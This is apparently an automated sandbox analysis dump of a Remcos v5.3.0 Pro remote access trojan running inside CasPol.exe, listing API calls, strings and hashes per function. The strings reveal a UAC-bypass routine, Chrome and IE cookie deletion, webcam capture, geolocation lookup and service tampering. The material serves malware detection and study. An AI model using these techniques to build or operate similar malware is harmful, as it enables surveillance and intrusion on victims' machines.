                                                                              • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                              APIs
                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • _free.LIBCMT ref: 00444086
                                                                              • _free.LIBCMT ref: 0044409D
                                                                              • _free.LIBCMT ref: 004440BC
                                                                              • _free.LIBCMT ref: 004440D7
                                                                              • _free.LIBCMT ref: 004440EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$AllocateHeap
                                                                              • String ID: J7D
                                                                              • API String ID: 3033488037-1677391033
                                                                              • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                              • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                              APIs
                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1324828854-0
                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                              • API String ID: 3114080316-344394840
                                                                              • Opcode ID: c7cce5a43e59f7109602142759317d9a4d8e8edd62c58d414e8fa74cc875f135
                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                              • Opcode Fuzzy Hash: c7cce5a43e59f7109602142759317d9a4d8e8edd62c58d414e8fa74cc875f135
                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                              APIs
                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                              • API String ID: 1133728706-4073444585
                                                                              • Opcode ID: 8901a8876a499c2edbdb9cb88194f9155861ea887fb9d44d6289f059aa3c6fcf
                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                              • Opcode Fuzzy Hash: 8901a8876a499c2edbdb9cb88194f9155861ea887fb9d44d6289f059aa3c6fcf
                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                              • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                              • String ID: P[G
                                                                              • API String ID: 2536120697-571123470
                                                                              • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                              • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                              APIs
                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                              Strings
                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                              • String ID: http://geoplugin.net/json.gp
                                                                              • API String ID: 3121278467-91888290
                                                                              • Opcode ID: a8345bfec3a0266268d270daa51b9d103f3819ad6082a53432280508f99075f6
                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                              • Opcode Fuzzy Hash: a8345bfec3a0266268d270daa51b9d103f3819ad6082a53432280508f99075f6
                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                              APIs
                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              • _free.LIBCMT ref: 0044FD34
                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                              • _free.LIBCMT ref: 0044FD93
                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                              • _free.LIBCMT ref: 0044FDB4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                              APIs
                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                              • API String ID: 3851391207-2637227304
                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                              • String ID: H]G
                                                                              • API String ID: 2536120697-1717957184
                                                                              • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                              • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                              APIs
                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                              Strings
                                                                              • UserProfile, xrefs: 0040B2B4
                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                              • API String ID: 2018770650-304995407
                                                                              • Opcode ID: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                              • Opcode Fuzzy Hash: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                              APIs
                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Console$AllocOutputShowWindow
                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                              • API String ID: 2425139147-2527699604
                                                                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                              • API String ID: 0-3292752334
                                                                              • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                              • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                              APIs
                                                                              • __allrem.LIBCMT ref: 00439789
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 1992179935-0
                                                                              • Opcode ID: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                              • Opcode Fuzzy Hash: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __cftoe
                                                                              • String ID:
                                                                              • API String ID: 4189289331-0
                                                                              • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                              • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16
                                                                              • String ID: a/p$am/pm
                                                                              • API String ID: 3509577899-3206640213
                                                                              • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                              • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologSleep
                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                              • API String ID: 3469354165-462540288
                                                                              • Opcode ID: b7a7af5974338e4e7418cb8442c76b406aea00602ad326a0828a5b4c16464c5d
                                                                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                              • Opcode Fuzzy Hash: b7a7af5974338e4e7418cb8442c76b406aea00602ad326a0828a5b4c16464c5d
                                                                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                              • String ID:
                                                                              • API String ID: 493672254-0
                                                                              • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                              • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                              • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                              • _free.LIBCMT ref: 00446EF6
                                                                              • _free.LIBCMT ref: 00446F1E
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                              • _abort.LIBCMT ref: 00446F3D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 3160817290-0
                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
